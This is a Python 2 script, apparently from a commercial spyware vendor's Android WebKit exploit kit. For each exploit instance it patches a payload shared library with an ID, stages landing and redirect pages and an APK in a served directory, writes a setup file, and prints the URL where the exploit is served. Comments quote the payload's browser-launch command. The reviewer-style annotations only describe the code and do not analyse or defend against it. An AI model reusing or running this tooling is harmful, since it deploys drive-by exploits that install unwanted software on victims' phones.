src/ht-webkit-Android23/add_exploit_instance.py
#!/usr/bin/env python
import os
import sys
import random
import shutil
import string
import struct
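def usage():
    """Print the command-line synopsis to stderr and exit with status 2.

    Called from every argument check in the ``__main__`` block when an
    argument is missing or malformed; it never returns.  The original
    printed to stdout and used the site-provided ``exit()`` builtin, which
    terminates with status 0, so a wrapper script could not tell a bad
    invocation from a successful run.
    """
    prog = sys.argv[0]
    sys.stderr.write(
        'usage: {} exploit_id server_ip shared_object redirect_page landing_page apk\n'.format(prog))
    sys.stderr.write(
        '\tpython2.7 {} 0123456789 192.168.1.1 libfingerprint.so redirect.html landing.html apkv2.apk\n'.format(prog))
    # sys.exit rather than exit(): the latter only exists when the site module
    # is loaded, and a non-zero status is the conventional "bad usage" signal.
    sys.exit(2)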
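def generate_available_exploit_id(length=10):
    """Return *length* random decimal digits that do not name an existing directory.

    The ``__main__`` block later calls ``os.mkdir`` on the returned value, so
    the only requirement is that the name is free in the current working
    directory; the loop re-draws until ``os.path.isdir`` reports it unused.
    The value is a collision-avoiding directory label (it is also embedded in
    the served URL path), so the ordinary ``random`` module is kept here.

    Args:
        length: number of digits to draw.  Defaults to 10, which is the
            length the argument check in ``__main__`` requires.

    Returns:
        str: an all-digit name of ``length`` characters for which
        ``os.path.isdir`` is false at the time of the check.
    """
    digits = string.digits
    while True:
        candidate = ''.join(random.choice(digits) for _ in range(length))
        # Re-draw on collision; with 10 digits a repeat is practically never hit.
        if not os.path.isdir(candidate):
            return candidate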
if __name__ == '__main__':
    # Entry point (Python 2: bare `print` statements, `str` is bytes).
    # Two modes, both relative to the current working directory:
    #   no arguments  -> print a free exploit_id and stop
    #   six arguments -> validate them, patch the shared object, create the
    #                    per-instance directory <exploit_id>/ and its setup.txt
    # Every validation failure goes through usage(), which does not return.
    # print a suitable exploit_id
    if len(sys.argv) == 1:
        exp_id = generate_available_exploit_id()
        print '[*] {} is available as exploit id '.format(exp_id)
        # exit() is the site-module builtin; it terminates with status 0.
        exit()
    # length
    if len(sys.argv) != 7:
        usage()
    # 1] exploit_id: exactly 10 characters that int() accepts.
    # NOTE(review): int() tolerates surrounding whitespace and a sign, so
    # ' 123456789' or '-123456789' pass this check although they are not ten
    # digits; str.isdigit() would be the stricter test.
    if len(sys.argv[1]) == 10:
        try:
            int(sys.argv[1])
        except ValueError:
            print 'exploit_id must be a 10 digits number'
            usage()
    else:
        print 'exploit_id must be a 10 digits number'
        usage()
    # The id doubles as a directory name, so an existing directory means the
    # instance was already provisioned (the mkdir below would raise OSError).
    if os.path.isdir(sys.argv[1]):
        print 'exploit id already exists, try with {}'.format(generate_available_exploit_id())
        exit()
    exploit_id = sys.argv[1]
    # 2] server_ip: dotted quad, every octet in 0..255.
    # NOTE(review): int(o) raises ValueError on a non-numeric octet
    # (e.g. 'a.b.c.d' or '1..2.3'), which escapes as a traceback instead of
    # reaching usage(). The value is only echoed into setup.txt and the
    # final URL; it is never validated as reachable.
    octects = sys.argv[2].split('.')
    if not ( len(octects) == 4 and all(0 <= int(o) < 256 for o in octects)):
        print('Wrong server ip')
        usage()
    server_ip = sys.argv[2]
    # 3] shared_object: must be an existing regular file; content is checked
    # later by counting the two needle strings.
    if not os.path.isfile(sys.argv[3]):
        print 'Shared object {} does not exist'.format(sys.argv[3])
        usage()
    shared_object = sys.argv[3]
    # 4] redirect_page: copied verbatim below, no content check.
    if not os.path.isfile(sys.argv[4]):
        print 'Redirect page {} does not exist'.format(sys.argv[4])
        usage()
    redirect_page = sys.argv[4]
    # 5] landing_page: copied verbatim below, no content check.
    if not os.path.isfile(sys.argv[5]):
        print 'Landing page {} does not exist'.format(sys.argv[5])
        usage()
    landing_page = sys.argv[5]
    # 6] apk: copied verbatim below, no content check.
    if not os.path.isfile(sys.argv[6]):
        print 'Apk {} does not exist'.format(sys.argv[6])
        usage()
    apk_path = sys.argv[6]
    ### params seems ok, patch the binary and proceed generating setup.txt ###
    # replace 0123456789 in
    # GET /news/0123456789/rep?%s HTTP/1.1
    # am start -n com.android.browser/.BrowserActivity http://%s/news/0123456789/update.html
    # so = map(lambda x : struct.unpack('>B', x)[0], open(shared_object, 'rb').read())
    # needle = map(lambda x : ord(x) , 'news/0123456789/')
    # Whole file read into memory as a Python 2 str, so plain text needles
    # can be searched/replaced in the binary. The file object is never closed
    # explicitly; CPython closes it when the reference is dropped.
    so = open(shared_object, 'rb').read()
    print '[*] {} is {} bytes, patching exploit_id'.format(shared_object, len(so))
    needle = 'news/0123456789/'
    # The placeholder id is expected exactly twice (the two strings quoted in
    # the comment above). The replacement is the same length, so no offsets in
    # the ELF shift.
    # NOTE(review): assert is used as input validation here and below; under
    # `python -O` these checks are stripped and an unexpected .so is patched
    # silently (or not at all).
    assert so.count(needle) == 2, 'Weird shared object'
    new_so = so.replace(needle, 'news/{}/'.format(exploit_id))
    # apk request string
    needle2 = 'news_0123456789_'
    assert so.count(needle2) == 1, 'Weird shared object 2'
    new_so = new_so.replace(needle2, 'news_{}_'.format(exploit_id))
    # create exploit_id dir and start dumping stuff into it
    # NOTE(review): the isdir check above and this mkdir are not atomic; a
    # concurrent run with the same id raises OSError here rather than being
    # reported by the friendlier message above.
    os.mkdir('{}'.format(exploit_id))
    # 1] write new so
    # Output name is <id>/<id>_libfingerprint.so regardless of the input
    # file's name; the handle is again left for the interpreter to close.
    open('{}/{}_libfingerprint.so'.format(exploit_id, exploit_id), 'wb').write(new_so)
    print '[*] shared object written'
    # 2] cp landing and redirect page
    # The pages are renamed to the fixed names referenced in setup.txt.
    shutil.copy(landing_page,'{}/landing.html'.format(exploit_id))
    shutil.copy(redirect_page,'{}/redirect.html'.format(exploit_id))
    print '[*] redirect/landing pages created'
    # 3] cp apk
    # Stored without the .apk extension, as <id>/<id>_apk.
    shutil.copy(apk_path, '{}/{}_apk'.format(exploit_id, exploit_id))
    print '[*] apk created'
    # create setup.txt, format:
    #
    # status:off
    # requests:8
    # ip:192.168.69.229
    # so:0123456789_libfingerprint.so
    # landing:landing.html
    # redirect:redirect.html
    # apk:0123456789_apk
    # Plain key:value lines, one per line. The instance starts disabled
    # (status:off) with a zero request counter; whatever serves the directory
    # presumably flips these -- that consumer is not in this file.
    setup = open('{}/setup.txt'.format(exploit_id), 'w')
    # Note the trailing space before '\n' on the first two lines; the reader
    # of setup.txt must tolerate it (cannot confirm from here).
    setup.write('status:off \n')
    setup.write('requests:0 \n')
    setup.write('ip:{}\n'.format(server_ip) )
    setup.write('so:{}_libfingerprint.so\n'.format(exploit_id))
    setup.write('landing:landing.html\n')
    setup.write('redirect:redirect.html\n')
    setup.write('apk:{}_apk\n'.format(exploit_id))
    setup.close()
    # The printed URL is assembled from the validated inputs only; nothing in
    # this script serves it or checks that page.cfm exists.
    print '[*] setup.txt created, exploit is served at:\n http://{}/news/{}/page.cfm'.format(server_ip,exploit_id)